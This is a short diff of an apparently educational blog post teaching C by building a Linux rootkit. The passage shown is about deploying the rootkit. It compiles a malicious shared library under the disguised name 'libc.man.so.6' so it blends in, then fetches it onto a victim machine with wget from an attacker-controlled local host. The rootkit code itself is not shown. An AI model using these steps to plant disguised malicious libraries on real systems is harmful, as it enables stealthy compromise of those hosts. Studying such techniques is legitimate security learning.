h0mbre/h0mbre.github.io/_posts/2019-09-29-Learn-C-By-Creating-A-Rootkit.md

 ## Actually Using the Damn Rootkit
 Let's actually use this thing.
 Let's pretend we're root on our victim machine, and it's time to install the malicious library.

 1. Let's set all the definitions specific for the victim host and compile the library.
 Let's give it a non-descriptive name, something that will blend in to the naked eye.
 (And let's put "man" in the file name because Manteau).
-Let's compile our C file with: `gcc -ldl manteau.c -fPIC -shared -D_GNU_SOURCE -o libc.man.so.6`
+Let's compile our C file with: `gcc  manteau.c -fPIC -shared -D_GNU_SOURCE -o libc.man.so.6 -ldl`
 2. Let's `wget` that to the victim, in our case an i386 Ubuntu machine running SSH.
 ```
 root@ubuntu:/home/manteau# wget http://192.168.1.218/libc.man.so.6